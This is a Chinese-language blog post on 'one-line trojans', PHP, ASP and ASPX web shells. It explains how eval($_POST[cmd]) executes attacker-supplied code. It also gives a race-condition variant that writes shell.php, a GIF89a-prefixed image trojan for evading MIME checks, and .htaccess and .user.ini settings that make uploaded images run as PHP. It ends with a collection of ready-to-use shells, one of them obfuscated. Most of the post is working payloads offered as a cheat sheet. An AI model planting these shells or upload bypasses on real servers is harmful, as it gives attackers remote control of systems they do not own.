一句话木马

发表于 2023-04-16 更新于 2023-07-19 分类于日报阅读次数：阅读次数：本文字数： 560 阅读时长 ≈ 2 分钟

# 置顶图标

什么是一句话木马

一句话木马是一种短小精悍的恶意代码，通常只有一行之长。
这种木马可以以上传文件、修改配置等方式将恶意代码植入到受害者服务器上
然后通过一些特殊手法在服务器端执行，以达到入侵控制目的。

常见的一句话木马

我们接触的一句话木马大多为这种，它需要在PHP环境中才可使用

<?php @eval($_POST[cmd]);  ?>

木马原理

（1）$_POST[cmd]
    $_POST 是 PHP 中的一个超全局变量，POST方式提交的所有变量，都会保存在此数组中，变量名即为键名
（2）eval()
    eval() 函数在 PHP 中用于执行字符串中的代码并返回执行结果。
    该函数对php语法要求严格，所传入语句必须以" ; "号结尾
（3）@
    符号@的作用是屏蔽该语句的报错信息
    如果站点PHP版本>=8.0的话会报错
（4）脉络梳理
    用eval函数，将我们post方式提交的名为cmd的变量，当做PHP代码执行，cmd变量可为任何攻击代码

可用于条件竞争的一句话木马

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])；  ?>' ); ?>

这段代码是用来创建一个名为shell.php的文件，并在其中写入一段代码。
这段代码的作用是接受一个POST请求中的cmd参数，并将其作为PHP代码执行。

图片马

木马内容

GIF89a
<?php @eval($_POST[cmd])；  ?>
 
//GIF89a 为了绕过可能存在的MIME头检测

.htaccess文件

<FilesMatch "jpg">  
SetHandler application/x-httpd-php
</FilesMatch>

//大体意思是设置当前目录所有带jpg的文件名都使用php解析
//无论上传任何文件，只要符合php语言代码规范，就会被当做PHP执行

.user.ini扩展文件

auto_prepend_file=shell.jpg
 
//意思就是当前目录中的php文件的页头会自动去包含shell.jpg中的文件内容
//auto_append_file 是页尾包含

一句话木马收集

ASP一句话木马：

<% execute(request("value")) %>

PHP一句话木马：

<?php @eval($_POST['value']); ?>

变形后的PHP一句话木马：

<?php
  $x = $_GET['z'];
  @eval("$x;");
?>

ASPX一句话木马：

<%@ Page Language="Jscript" %>
<% eval(Request.Item["value"]) %>